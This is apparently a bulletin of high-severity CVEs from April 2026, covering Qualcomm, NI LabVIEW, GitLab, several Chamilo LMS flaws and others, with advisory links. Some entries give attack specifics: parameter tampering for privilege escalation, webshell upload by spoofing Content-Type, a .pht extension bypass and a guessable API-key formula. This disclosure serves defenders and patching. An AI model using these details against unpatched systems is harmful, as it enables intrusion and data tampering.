WAGO--CC100 (0751-9x01) | An authenticated remote attacker with high privileges can exploit the OpenVPN configuration via the web-based management interface of a WAGO PLC. If user-defined scripts are permitted, OpenVPN may allow the execution of arbitrary shell commands, enabling the attacker to run arbitrary commands on the device. | 2026-04-09 | 7.2 | CVE-2024-1490 [ https://www.cve.org/CVERecord?id=CVE-2024-1490 ] https://certvde.com/de/advisories/VDE-2024-008
https://wago.csaf-tp.certvde.com/.well-known/csaf/white/2026/vde-2024-008.json

GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 13.0 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service by sending repeated GraphQL queries. | 2026-04-08 | 7.5 | CVE-2025-12664 [ https://www.cve.org/CVERecord?id=CVE-2025-12664 ] HackerOne Bug Bounty Report #3377091 [ https://hackerone.com/reports/3377091 ]
https://gitlab.com/gitlab-org/gitlab/-/work_items/579376
https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/

Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libssh. This vulnerability allows local man-in-the-middle attacks, security downgrades of SSH (Secure Shell) connections, and manipulation of trusted host information, posing a significant risk to the confidentiality, integrity, and availability of SSH communications via an insecure default configuration on Windows systems where the library automatically loads configuration files from the C:\etc directory, which can be created and modified by unprivileged local users. | 2026-04-07 | 7.8 | CVE-2025-14821 [ https://www.cve.org/CVERecord?id=CVE-2025-14821 ] https://access.redhat.com/security/cve/CVE-2025-14821
RHBZ#2423148 [ https://bugzilla.redhat.com/show_bug.cgi?id=2423148 ]
https://www.libssh.org/2026/02/10/libssh-0-12-0-and-0-11-4-security-releases/

Qualcomm, Inc.--Snapdragon | Memory corruption when buffer copy operation fails due to integer overflow during attestation report generation. | 2026-04-06 | 7.8 | CVE-2025-47389 [ https://www.cve.org/CVERecord?id=CVE-2025-47389 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

Qualcomm, Inc.--Snapdragon | Memory corruption while preprocessing IOCTL request in JPEG driver. | 2026-04-06 | 7.8 | CVE-2025-47390 [ https://www.cve.org/CVERecord?id=CVE-2025-47390 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

Qualcomm, Inc.--Snapdragon | Memory corruption while processing a frame request from user. | 2026-04-06 | 7.8 | CVE-2025-47391 [ https://www.cve.org/CVERecord?id=CVE-2025-47391 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

Qualcomm, Inc.--Snapdragon | Cryptographic issue while copying data to a destination buffer without validating its size. | 2026-04-06 | 7.1 | CVE-2025-47400 [ https://www.cve.org/CVERecord?id=CVE-2025-47400 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

Case Themes--Case Theme User | Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Case Themes Case Theme User allows PHP Local File Inclusion. This issue affects Case Theme User: from n/a before 1.0.4. | 2026-04-10 | 7.5 | CVE-2025-5804 [ https://www.cve.org/CVERecord?id=CVE-2025-5804 ] https://patchstack.com/database/wordpress/plugin/case-theme-user/vulnerability/wordpress-case-theme-user-1-0-4-local-file-inclusion-vulnerability?_s_id=cve

Zootemplate--Cerato | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Zootemplate Cerato allows Reflected XSS. This issue affects Cerato: from n/a through 2.2.18. | 2026-04-10 | 7.1 | CVE-2025-58920 [ https://www.cve.org/CVERecord?id=CVE-2025-58920 ] https://patchstack.com/database/wordpress/theme/cerato/vulnerability/wordpress-cerato-theme-2-2-18-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve

GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 12.10 before 18.8.9, 18.9 before 18.9.5, and 18.10 before 18.10.3 that could have allowed an unauthenticated user to cause denial of service due to improper input validation of JSON payloads. | 2026-04-08 | 7.5 | CVE-2026-1092 [ https://www.cve.org/CVERecord?id=CVE-2026-1092 ] HackerOne Bug Bounty Report #3487030 [ https://hackerone.com/reports/3487030 ]
https://gitlab.com/gitlab-org/gitlab/-/work_items/586479
https://about.gitlab.com/releases/2026/04/08/patch-release-gitlab-18-10-3-released/

IBM--Verify Identity Access Container | IBM Verify Identity Access Container 11.0 through 11.0.2 and IBM Security Verify Access Container 10.0 through 10.0.9.1 and IBM Verify Identity Access 11.0 through 11.0.2 and IBM Security Verify Access 10.0 through 10.0.9.1 allows an attacker to contact internal authentication endpoints which are protected by the Reverse Proxy. | 2026-04-08 | 7.2 | CVE-2026-1343 [ https://www.cve.org/CVERecord?id=CVE-2026-1343 ] https://www.ibm.com/support/pages/node/7268253

Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in gnutls. A remote, unauthenticated attacker can exploit this vulnerability by sending a specially crafted ClientHello message with an invalid Pre-Shared Key (PSK) binder value during the TLS handshake. This can lead to a NULL pointer dereference, causing the server to crash and resulting in a remote Denial of Service (DoS) condition. | 2026-04-09 | 7.5 | CVE-2026-1584 [ https://www.cve.org/CVERecord?id=CVE-2026-1584 ] https://access.redhat.com/security/cve/CVE-2026-1584
RHBZ#2435258 [ https://bugzilla.redhat.com/show_bug.cgi?id=2435258 ]

Qualcomm, Inc.--Snapdragon | Transient DOS when processing nonstandard FILS Discovery Frames with out-of-range action sizes during initial scans. | 2026-04-06 | 7.6 | CVE-2026-21367 [ https://www.cve.org/CVERecord?id=CVE-2026-21367 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

Qualcomm, Inc.--Snapdragon | Memory Corruption when retrieving output buffer with insufficient size validation. | 2026-04-06 | 7.8 | CVE-2026-21371 [ https://www.cve.org/CVERecord?id=CVE-2026-21371 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

Qualcomm, Inc.--Snapdragon | Memory Corruption when sending IOCTL requests with invalid buffer sizes during memcpy operations. | 2026-04-06 | 7.8 | CVE-2026-21372 [ https://www.cve.org/CVERecord?id=CVE-2026-21372 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing an output buffer without validating its size during IOCTL processing. | 2026-04-06 | 7.8 | CVE-2026-21373 [ https://www.cve.org/CVERecord?id=CVE-2026-21373 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

Qualcomm, Inc.--Snapdragon | Memory Corruption when processing auxiliary sensor input/output control commands with insufficient buffer size validation. | 2026-04-06 | 7.8 | CVE-2026-21374 [ https://www.cve.org/CVERecord?id=CVE-2026-21374 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing an output buffer without validating its size during IOCTL processing. | 2026-04-06 | 7.8 | CVE-2026-21375 [ https://www.cve.org/CVERecord?id=CVE-2026-21375 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing an output buffer without validating its size during IOCTL processing in a camera sensor driver. | 2026-04-06 | 7.8 | CVE-2026-21376 [ https://www.cve.org/CVERecord?id=CVE-2026-21376 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

Qualcomm, Inc.--Snapdragon | Memory Corruption when accessing an output buffer without validating its size during IOCTL processing in a camera sensor driver. | 2026-04-06 | 7.8 | CVE-2026-21378 [ https://www.cve.org/CVERecord?id=CVE-2026-21378 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

Qualcomm, Inc.--Snapdragon | Memory Corruption when using deprecated DMABUF IOCTL calls to manage video memory. | 2026-04-06 | 7.8 | CVE-2026-21380 [ https://www.cve.org/CVERecord?id=CVE-2026-21380 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

Qualcomm, Inc.--Snapdragon | Transient DOS when receiving a service data frame with excessive length during device matching over a neighborhood awareness network protocol connection. | 2026-04-06 | 7.6 | CVE-2026-21381 [ https://www.cve.org/CVERecord?id=CVE-2026-21381 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

Qualcomm, Inc.--Snapdragon | Memory Corruption when handling power management requests with improperly sized input/output buffers. | 2026-04-06 | 7.8 | CVE-2026-21382 [ https://www.cve.org/CVERecord?id=CVE-2026-21382 ] https://docs.qualcomm.com/product/publicresources/securitybulletin/april-2026-bulletin.html

Juniper Networks--Junos OS | A UNIX Symbolic Link (Symlink) Following vulnerability in the CLI of Juniper Networks Junos OS allows a local, authenticated attacker with low privileges to escalate their privileges to root, which will lead to a complete compromise of the system. When, after a user has performed a specific 'file link ...' CLI operation, another user commits (unrelated configuration changes), the first user can log in as root. This issue affects Junos OS: * all versions before 23.2R2-S7, * 23.4 versions before 23.4R2-S6, * 24.2 versions before 24.2R2-S3, * 24.4 versions before 24.4R2-S2, * 25.2 versions before 25.2R2. This issue does not affect versions 25.4R1 or later. | 2026-04-09 | 7.3 | CVE-2026-21916 [ https://www.cve.org/CVERecord?id=CVE-2026-21916 ] https://kb.juniper.net/JSA107807

    Dolibarr--Dolibarr ERP/CRM
    Dolibarr ERP/CRM versions prior to 23.0.2 contain an authenticated remote code execution vulnerability in the dol_eval_standard() function that fails to apply forbidden string checks in whitelist mode and does not detect PHP dynamic callable syntax. Attackers with administrator privileges can inject malicious payloads through computed extrafields or other evaluation paths using PHP dynamic callable syntax to bypass validation and achieve arbitrary command execution via eval().
    Published: 2026-04-07 | CVSS: 7.2 | CVE-2026-22666 [ https://www.cve.org/CVERecord?id=CVE-2026-22666 ]
    Source:
    https://jivasecurity.com/writeups/dolibarr-remote-code-execution-cve-2026-22666
    https://github.com/Dolibarr/dolibarr/security/advisories/GHSA-vmvw-qq8w-wqhg
    https://github.com/Dolibarr/dolibarr/commit/6f425521b3e6f9f27eca05228e02093dbaa40dea
    https://github.com/Dolibarr/dolibarr/releases/tag/23.0.2
    https://www.vulncheck.com/advisories/dolibarr-erp-crm-authenticated-rce-via-dol-eval-standard

    HKUDS--OpenHarness
    OpenHarness prior to commit 166fcfe contains an improper access control vulnerability in built-in file tools due to inconsistent parameter handling in permission enforcement, allowing attackers who can influence agent tool execution to read arbitrary local files outside the intended repository scope. Attackers can exploit the path parameter not being passed to the PermissionChecker in the read_file, write_file, edit_file, and notebook_edit tools to bypass deny rules and access sensitive files such as configuration files, credentials, and SSH material, or create and overwrite files in restricted host paths in full_auto mode.
    Published: 2026-04-07 | CVSS: 7.1 | CVE-2026-22682 [ https://www.cve.org/CVERecord?id=CVE-2026-22682 ]
    Source:
    https://github.com/HKUDS/OpenHarness/pull/32
    https://github.com/HKUDS/OpenHarness/commit/166fcfefb7614dbac51bd061f56542725b0298e9
    https://www.vulncheck.com/advisories/openharness-improper-access-control-via-file-tools

    VMware--Spring Cloud Gateway
    When configuring SSL bundles in Spring Cloud Gateway by using the configuration property spring.ssl.bundle, the configuration was silently ignored and the default SSL configuration was used instead. Note: The 4.2.x branch is no longer under open source support. If you are using Spring Cloud Gateway 4.2.0 and are not an enterprise customer, you can upgrade to any Spring Cloud Gateway 4.2.x release newer than 4.2.0 available on Maven Central ( https://repo1.maven.org/maven2/org/springframework/cloud/spring-cloud-gateway/ ). Ideally, if you are not an enterprise customer, you should upgrade to 5.0.2 or 5.1.1, which are the currently supported open source releases.
    Published: 2026-04-10 | CVSS: 7.5 | CVE-2026-22750 [ https://www.cve.org/CVERecord?id=CVE-2026-22750 ]
    Source: https://spring.io/security/cve-2026-22750

    Dell--Elastic Cloud Storage
    Dell Elastic Cloud Storage, version 3.8.1.7 and prior, and Dell ObjectScale, versions prior to 4.1.0.3 and version 4.2.0.0, contain an Insertion of Sensitive Information into Log File vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to secret exposure. The attacker may be able to use the exposed secret to access the vulnerable system with the privileges of the compromised account.
    Published: 2026-04-08 | CVSS: 7.8 | CVE-2026-28261 [ https://www.cve.org/CVERecord?id=CVE-2026-28261 ]
    Source: https://www.dell.com/support/kbdoc/en-us/000449325/dsa-2026-143-security-update-for-dell-objectscale-prior-to-4-1-0-3-and-4-2-0-0-insertion-of-sensitive-information-into-log-file-vulnerability

    CouchCMS--CouchCMS
    CouchCMS contains a privilege escalation vulnerability that allows authenticated Admin-level users to create SuperAdmin accounts by tampering with the f_k_levels_list parameter in user creation requests. Attackers can modify the parameter value from 4 to 10 in the HTTP request body to bypass authorization validation and gain full application control, circumventing restrictions on SuperAdmin account creation and privilege assignment.
    Published: 2026-04-10 | CVSS: 7.2 | CVE-2026-29002 [ https://www.cve.org/CVERecord?id=CVE-2026-29002 ]
    Source:
    https://gist.github.com/thepiyushkumarshukla/477e2d2bbbe8cc3ec0d640c50f0cf9e1
    https://www.couchcms.com/
    https://www.vulncheck.com/advisories/couchcms-privilege-escalation-via-f-k-levels-list-parameter

    glpi-project--glpi
    GLPI is a free asset and IT management software package. From 10.0.0 to before 10.0.24 and 11.0.6, an authenticated user can perform a SQL injection via the logs export feature. This vulnerability is fixed in 10.0.24 and 11.0.6.
    Published: 2026-04-06 | CVSS: 7.2 | CVE-2026-29047 [ https://www.cve.org/CVERecord?id=CVE-2026-29047 ]
    Source: https://github.com/glpi-project/glpi/security/advisories/GHSA-3m49-qf92-vccr

    open-telemetry--opentelemetry-go
    OpenTelemetry-Go is the Go implementation of OpenTelemetry. From 1.36.0 to 1.40.0, multi-value baggage: header extraction parses each header field-value independently and aggregates members across values. This allows an attacker to amplify CPU usage and allocations by sending many baggage: header lines, even when each individual value is within the 8192-byte per-value parse limit. This vulnerability is fixed in 1.41.0.
    Published: 2026-04-07 | CVSS: 7.5 | CVE-2026-29181 [ https://www.cve.org/CVERecord?id=CVE-2026-29181 ]
    Source: https://github.com/open-telemetry/opentelemetry-go/security/advisories/GHSA-mh2q-q3fh-2475

    Tinyproxy Project--Tinyproxy
    Tinyproxy through 1.11.3 is vulnerable to HTTP request parsing desynchronization due to a case-sensitive comparison of the Transfer-Encoding header in src/reqs.c. The is_chunked_transfer() function uses strcmp() to compare the header value against "chunked", even though RFC 7230 specifies that transfer-coding names are case-insensitive. By sending a request with Transfer-Encoding: Chunked, an unauthenticated remote attacker can cause Tinyproxy to misinterpret the request as having no body. In this state, Tinyproxy sets content_length.client to -1, skips pull_client_data_chunked(), forwards request headers upstream, and transitions into relay_connection() raw TCP forwarding while unread body data remains buffered. This leads to inconsistent request state between Tinyproxy and backend servers. RFC-compliant backends (e.g., Node.js, Nginx) will continue waiting for chunked body data, causing connections to hang indefinitely. This behavior enables application-level denial of service through backend worker exhaustion. Additionally, in deployments where Tinyproxy is used for request-body inspection, filtering, or security enforcement, the unread body may be forwarded without proper inspection, resulting in potential security control bypass.
    Published: 2026-04-07 | CVSS: 7.5 | CVE-2026-31842 [ https://www.cve.org/CVERecord?id=CVE-2026-31842 ]
    Source:
    Upstream issue report and reproduction details [ https://github.com/tinyproxy/tinyproxy/issues/604 ]
    Tinyproxy upstream project [ https://github.com/tinyproxy/tinyproxy ]
    RFC 7230: transfer-coding names are case-insensitive [ https://datatracker.ietf.org/doc/html/rfc7230 ]

    chamilo--chamilo-lms
    Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, in main/lp/aicc_hacp.php, user-controlled request parameters are directly used to set the PHP session ID before loading the global bootstrap. This leads to session fixation. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.
    Published: 2026-04-10 | CVSS: 7.5 | CVE-2026-31940 [ https://www.cve.org/CVERecord?id=CVE-2026-31940 ]
    Source:
    https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-4gp7-cfjh-77gv
    https://github.com/chamilo/chamilo-lms/commit/ce0192c62e48c9d9474d915c541b3274844afbf9
    https://github.com/chamilo/chamilo-lms/commit/e337b7cc74a0276a0b4f91f9282204d20cac1869

    chamilo--chamilo-lms
    Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains a Server-Side Request Forgery (SSRF) vulnerability in the Social Wall feature. The endpoint read_url_with_open_graph accepts a URL from the user via the social_wall_new_msg_main POST parameter and performs two server-side HTTP requests to that URL without validating whether the target is an internal or external resource. This allows an authenticated attacker to force the server to make arbitrary HTTP requests to internal services, scan internal ports, and access cloud instance metadata. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.
    Published: 2026-04-10 | CVSS: 7.7 | CVE-2026-31941 [ https://www.cve.org/CVERecord?id=CVE-2026-31941 ]
    Source:
    https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-q74c-mx8x-489h
    https://github.com/chamilo/chamilo-lms/commit/e3790c5f0ff3b4dc547c2099fadf5c438c1bb265
    https://github.com/chamilo/chamilo-lms/commit/ea6b7b7e90580c9b01dc4bcafe4ad737061e0ead

    chartbrew--chartbrew
    Chartbrew is an open-source web application that can connect directly to databases and APIs and use the data to create charts. Prior to 4.9.0, a cross-tenant authorization bypass exists in Chartbrew in GET /team/:team_id/template/generate/:project_id. The GET handler calls checkAccess(req, "updateAny", "chart") without awaiting the returned promise, and it does not verify that the supplied project_id belongs to req.params.team_id or to the caller's team. As a result, an authenticated attacker with valid template-generation permissions in their own team can request the template model for a project belonging to another team and receive victim project data. This vulnerability is fixed in 4.9.0.
    Published: 2026-04-10 | CVSS: 7.7 | CVE-2026-32252 [ https://www.cve.org/CVERecord?id=CVE-2026-32252 ]
    Source:
    https://github.com/chartbrew/chartbrew/security/advisories/GHSA-mw4f-cf22-qpcj
    https://github.com/chartbrew/chartbrew/commit/bf5919043d3587fcbe76123aaabd9a0a9d1033f1

    Red Hat--mirror registry for Red Hat OpenShift
    A flaw was found in Red Hat Quay's container image upload process. An authenticated user with push access to any repository on the registry can interfere with image uploads in progress by other users, including those in repositories they do not have access to. This could allow the attacker to read, modify, or cancel another user's in-progress image upload.
    Published: 2026-04-08 | CVSS: 7.1 | CVE-2026-32589 [ https://www.cve.org/CVERecord?id=CVE-2026-32589 ]
    Source:
    https://access.redhat.com/security/cve/CVE-2026-32589
    RHBZ#2446963 [ https://bugzilla.redhat.com/show_bug.cgi?id=2446963 ]

    Red Hat--mirror registry for Red Hat OpenShift
    A flaw was found in Red Hat Quay's handling of resumable container image layer uploads. The upload process stores intermediate data in the database using a format that, if tampered with, could allow an attacker to execute arbitrary code on the Quay server.
    Published: 2026-04-08 | CVSS: 7.1 | CVE-2026-32590 [ https://www.cve.org/CVERecord?id=CVE-2026-32590 ]
    Source:
    https://access.redhat.com/security/cve/CVE-2026-32590
    RHBZ#2446964 [ https://bugzilla.redhat.com/show_bug.cgi?id=2446964 ]

    NI--LabVIEW
    There is a memory corruption vulnerability due to an out-of-bounds write when loading a corrupted LVLIB file in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted .lvlib file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions.
    Published: 2026-04-07 | CVSS: 7.8 | CVE-2026-32860 [ https://www.cve.org/CVERecord?id=CVE-2026-32860 ]
    Source: https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/lv-project-library-file-parsing-memory-corruption-vulnerability-in-ni-labview.html

    NI--LabVIEW
    There is a memory corruption vulnerability due to an out-of-bounds write when loading a corrupted LVCLASS file in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted .lvclass file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions.
    Published: 2026-04-07 | CVSS: 7.8 | CVE-2026-32861 [ https://www.cve.org/CVERecord?id=CVE-2026-32861 ]
    Source: https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/lv-class-file-parsing-memory-corruption-vulnerability-in-ni-labview.html

    NI--LabVIEW
    There is a memory corruption vulnerability due to an out-of-bounds write in ResFileFactory::InitResourceMgr() in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions.
    Published: 2026-04-07 | CVSS: 7.8 | CVE-2026-32862 [ https://www.cve.org/CVERecord?id=CVE-2026-32862 ]
    Source: https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni-labview.html

    NI--LabVIEW
    There is a memory corruption vulnerability due to an out-of-bounds read in sentry_transaction_context_set_operation() in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions.
    Published: 2026-04-07 | CVSS: 7.8 | CVE-2026-32863 [ https://www.cve.org/CVERecord?id=CVE-2026-32863 ]
    Source: https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni-labview.html

    NI--LabVIEW
    There is a memory corruption vulnerability due to an out-of-bounds read in mgcore_SH_25_3!aligned_free() in NI LabVIEW. This vulnerability may result in information disclosure or arbitrary code execution. Successful exploitation requires an attacker to get a user to open a specially crafted VI file. This vulnerability affects NI LabVIEW 2026 Q1 (26.1.0) and prior versions.
    Published: 2026-04-07 | CVSS: 7.8 | CVE-2026-32864 [ https://www.cve.org/CVERecord?id=CVE-2026-32864 ]
    Source: https://www.ni.com/en/support/security/available-critical-and-security-updates-for-ni-software/2026/memory-corruption-vulnerabilities-in-ni-labview.html

    chamilo--chamilo-lms
    Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the gradebook result view page allows any authenticated teacher to delete any student's grade result across the entire platform by manipulating the delete_mark or resultdelete GET parameters. No ownership or course-scope verification is performed. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.
    Published: 2026-04-10 | CVSS: 7.1 | CVE-2026-32894 [ https://www.cve.org/CVERecord?id=CVE-2026-32894 ]
    Source:
    https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-rqpg-p95v-fv98
    https://github.com/chamilo/chamilo-lms/commit/3b03306d1a0301a81b9284e86893b27f518ab151
    https://github.com/chamilo/chamilo-lms/commit/740f5a6e192a52a3adde3c3241c86401b1d2c519

    chamilo--chamilo-lms
    Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an Insecure Direct Object Reference (IDOR) vulnerability in the gradebook evaluation edit page allows any authenticated teacher to view and modify the settings (name, max score, weight) of evaluations belonging to any other course by manipulating the editeval GET parameter. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.
    Published: 2026-04-10 | CVSS: 7.1 | CVE-2026-32930 [ https://www.cve.org/CVERecord?id=CVE-2026-32930 ]
    Source:
    https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-9h22-wrg7-82q6
    https://github.com/chamilo/chamilo-lms/commit/63e1e6d3d717bd537c7c61719416da35aaa658dd
    https://github.com/chamilo/chamilo-lms/commit/f03f681df939db0429edc8414fb3ce4e4b80d79d

    chamilo--chamilo-lms
    Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, an unrestricted file upload vulnerability in the exercise sound upload function allows an authenticated teacher to upload a PHP webshell by spoofing the Content-Type header to audio/mpeg. The uploaded file retains its original .php extension and is placed in a web-accessible directory, enabling Remote Code Execution as the web server user (www-data). This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.
    Published: 2026-04-10 | CVSS: 7.5 | CVE-2026-32931 [ https://www.cve.org/CVERecord?id=CVE-2026-32931 ]
    Source:
    https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-863j-h6pf-3xhx
    https://github.com/chamilo/chamilo-lms/commit/8cbe660de267f2b6ed625433bdfcf38dee8752b4
    https://github.com/chamilo/chamilo-lms/commit/d5ef5153df3d1b2de112cbeb190cdd10bea457f3

    aces--Loris
    LORIS (Longitudinal Online Research and Imaging System) is a self-hosted web application that provides data and project management for neuroimaging research. Prior to 27.0.3 and 28.0.1, a SQL injection has been identified in some code sections for the MRI feedback popup window of the imaging browser. Attackers can use SQL injection to access or alter data on the server. This vulnerability is fixed in 27.0.3 and 28.0.1.
    Published: 2026-04-08 | CVSS: 7.5 | CVE-2026-33350 [ https://www.cve.org/CVERecord?id=CVE-2026-33350 ]
    Source: https://github.com/aces/Loris/security/advisories/GHSA-9r29-6jgc-3ggh

    Elastic--Kibana
    Incorrect Authorization (CWE-863) in Kibana can lead to information disclosure via Privilege Abuse (CAPEC-122). A user with limited Fleet privileges can exploit an internal API endpoint to retrieve sensitive configuration data, including private keys and authentication tokens, that should only be accessible to users with higher-level settings privileges. The endpoint composes its response by fetching full configuration objects and returning them directly, bypassing the authorization checks enforced by the dedicated settings APIs.
    Published: 2026-04-08 | CVSS: 7.7 | CVE-2026-33461 [ https://www.cve.org/CVERecord?id=CVE-2026-33461 ]
    Source: https://discuss.elastic.co/t/kibana-8-19-14-9-2-8-9-3-3-security-update-esa-2026-24/385812

    distribution--distribution
    Distribution is a toolkit to pack, ship, store, and deliver container content. Prior to 3.1.0, in pull-through cache mode, distribution discovers token auth endpoints by parsing WWW-Authenticate challenges returned by the configured upstream registry. The realm URL from a bearer challenge is used without validating that it matches the upstream registry host. As a result, an attacker-controlled upstream (or an attacker with MitM position to the upstream) can cause distribution to send the configured upstream credentials via basic auth to an attacker-controlled realm URL. This vulnerability is fixed in 3.1.0.
    Published: 2026-04-06 | CVSS: 7.5 | CVE-2026-33540 [ https://www.cve.org/CVERecord?id=CVE-2026-33540 ]
    Source: https://github.com/distribution/distribution/security/advisories/GHSA-3p65-76g6-3w7r

    themeum--Tutor LMS eLearning and online course solution
    The Tutor LMS - eLearning and online course solution plugin for WordPress is vulnerable to an Insecure Direct Object Reference in all versions up to, and including, 3.9.7. This is due to missing authentication and authorization checks in the `pay_incomplete_order()` function. The function accepts an attacker-controlled `order_id` parameter and uses it to look up order data, then writes billing fields to the order owner's profile (`$order_data->user_id`) without verifying the requester's identity or ownership. Because the Tutor nonce (`_tutor_nonce`) is exposed on public frontend pages, this makes it possible for unauthenticated attackers to overwrite the billing profile (name, email, phone, address) of any user who has an incomplete manual order, by sending a crafted POST request with a guessed or enumerated `order_id`.
    Published: 2026-04-10 | CVSS: 7.5 | CVE-2026-3360 [ https://www.cve.org/CVERecord?id=CVE-2026-3360 ]
    Source:
    https://www.wordfence.com/threat-intel/vulnerabilities/id/7f365519-dd0a-4f39-880d-7216ce2f7d1e?source=cve
    https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/classes/Tutor.php#L563
    https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L108
    https://plugins.trac.wordpress.org/browser/tutor/tags/3.9.7/ecommerce/CheckoutController.php#L1059
    https://plugins.trac.wordpress.org/browser/tutor/trunk/ecommerce/CheckoutController.php#L1059
    https://plugins.trac.wordpress.org/changeset/3496394/tutor/trunk/ecommerce/CheckoutController.php

    chamilo--chamilo-lms
    Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, Chamilo LMS contains an Insecure Direct Object Reference (IDOR) vulnerability in the Learning Path progress saving endpoint. The file lp_ajax_save_item.php accepts a uid (user ID) parameter directly from $_REQUEST and uses it to load and modify another user's Learning Path progress (including score, status, completion, and time) without verifying that the requesting user matches the target user ID. Any authenticated user enrolled in a course can overwrite another user's Learning Path progress by simply changing the uid parameter in the request. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.
    Published: 2026-04-10 | CVSS: 7.1 | CVE-2026-33702 [ https://www.cve.org/CVERecord?id=CVE-2026-33702 ]
    Source:
    https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3rv7-9fhx-j654
    https://github.com/chamilo/chamilo-lms/commit/6331d051b4468deb5830c01d1e047c5e5cf2c74f
    https://github.com/chamilo/chamilo-lms/commit/bf3f6c6949b5c882b48a9914baa19910417e4551

    chamilo--chamilo-lms
    Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user (including students) can write arbitrary content to files on the server via the BigUpload endpoint. The key parameter controls the filename and the raw POST body becomes the file content. While .php extensions are filtered to .phps, the .pht extension passes through unmodified. On Apache configurations where .pht is handled as PHP, this leads to Remote Code Execution. This vulnerability is fixed in 1.11.38.
    Published: 2026-04-10 | CVSS: 7.1 | CVE-2026-33704 [ https://www.cve.org/CVERecord?id=CVE-2026-33704 ]
    Source:
    https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-phfx-pwwg-945v
    https://github.com/chamilo/chamilo-lms/commit/9748f1ffbdb8b6dc84c0e0591c9d3c1d92e21c00

    chamilo--chamilo-lms
    Chamilo LMS is a learning management system. Prior to 1.11.38, any authenticated user with a REST API key can modify their own status field via the update_user_from_username endpoint. A student (status=5) can change their status to Teacher/CourseManager (status=1), gaining course creation and management privileges. This vulnerability is fixed in 1.11.38.
    Published: 2026-04-10 | CVSS: 7.1 | CVE-2026-33706 [ https://www.cve.org/CVERecord?id=CVE-2026-33706 ]
    Source:
    https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-3gqc-xr75-pcpw
    https://github.com/chamilo/chamilo-lms/commit/0acf8a196307c66c049f97f5ff76cf21c4a08127

    chamilo--chamilo-lms
    Chamilo LMS is a learning management system. Prior to 1.11.38 and 2.0.0-RC.3, REST API keys are generated using md5(time() + (user_id * 5) - rand(10000, 10000)). The rand(10000, 10000) call always returns exactly 10000 (min == max), making the formula effectively md5(timestamp + user_id*5 - 10000). An attacker who knows a username and approximate key creation time can brute-force the API key. This vulnerability is fixed in 1.11.38 and 2.0.0-RC.3.
